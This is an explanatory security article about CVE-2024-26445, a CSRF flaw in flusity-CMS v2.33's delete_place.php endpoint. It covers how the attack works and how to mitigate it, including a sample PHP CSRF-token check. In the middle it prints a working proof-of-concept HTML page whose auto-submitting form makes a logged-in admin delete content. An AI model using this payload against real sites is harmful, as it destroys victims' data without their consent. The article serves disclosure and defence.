In February 2024, cybersecurity researchers discovered a serious Cross-Site Request Forgery (CSRF) vulnerability in flusity-CMS version 2.33. This weakness, tracked as CVE-2024-26445, allows attackers to trick authenticated users into performing sensitive actions—such as deleting data—without their intent, by abusing the /core/tools/delete_place.php component.
In this article, you’ll see how the vulnerability works, explore a proof-of-concept (PoC) exploit, and learn steps for mitigation. If you're running flusity-CMS v2.33, read on—you could be at risk.
What Is CSRF?
CSRF (Cross-Site Request Forgery) is a web security bug where attackers trick users into submitting unwanted actions on a web app where they’re already logged in. It happens when an application relies only on session cookies for user verification, not on anti-CSRF protections like tokens.
Version: v2.33
- Component: /core/tools/delete_place.php
Attack Complexity: Low
In flusity-CMS v2.33, the /core/tools/delete_place.php endpoint lets authenticated users delete a "place", possibly a content element. Crucially, this endpoint lacks CSRF protection, meaning a simple crafted HTML request can make *any logged-in admin* delete data, just by visiting a malicious page.
The target must be logged into flusity-CMS as an admin (or with delete privileges).
2. The attacker tricks the target into visiting a malicious link or page (for example, via email or chat).
3. The browser sends a hidden request to /core/tools/delete_place.php as if the admin had clicked "Delete" inside the CMS itself!
Because flusity-CMS v2.33 doesn’t check for CSRF tokens, it can’t tell whether the request is genuine.
Exploit Proof of Concept
Below is a simple PoC HTML snippet that an attacker could host on their own website or send by email. If a logged-in admin visits this page, their browser will perform a POST or GET request to the vulnerable PHP file, instructing the CMS to delete a resource—*without their knowledge*.
Exploit Example (HTML)
<!-- CSRF Exploit for flusity-CMS v2.33 -->
<html>
<body>
<form action="http://victim-cms.com/core/tools/delete_place.php"; method="POST" id="csrfForm">
<input type="hidden" name="place_id" value="1"> <!-- Replace with target place ID -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
How this works
- If an admin is logged into flusity-CMS and visits the above HTML page, their browser will send a POST request to the delete endpoint.
References
- NVD Entry: CVE-2024-26445
- Exploit Report: huntr.dev advisory
Upgrade: Check if the vendor has released a patched version. Apply it ASAP.
2. Add CSRF Protection: Ensure all sensitive endpoints require a unique, unpredictable CSRF token per session and per action.
3. Verify User Intent: Always validate actions with user prompts or re-confirm credentials for destructive tasks.
Example of a basic PHP CSRF token check
// At form generation
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
// In the form
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
// At the top of delete_place.php
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
die("CSRF validation failed.");
}
Final Thoughts
CVE-2024-26445 is a textbook example of how easily CSRF can sneak into even mature open-source projects like flusity-CMS. With public exploit details now available, threat actors may automate these attacks.
Stay safe: Patch your systems, add missing CSRF protections, and always keep security top-of-mind when developing or deploying any web app.
Please share this article with your network—let’s make CMS security everyone’s responsibility!
*Exclusive for this post. For in-depth guidance, check official resources or consult with a web security expert.*
Timeline
Published on: 02/22/2024 14:15:47 UTC
Last modified on: 08/28/2024 21:35:06 UTC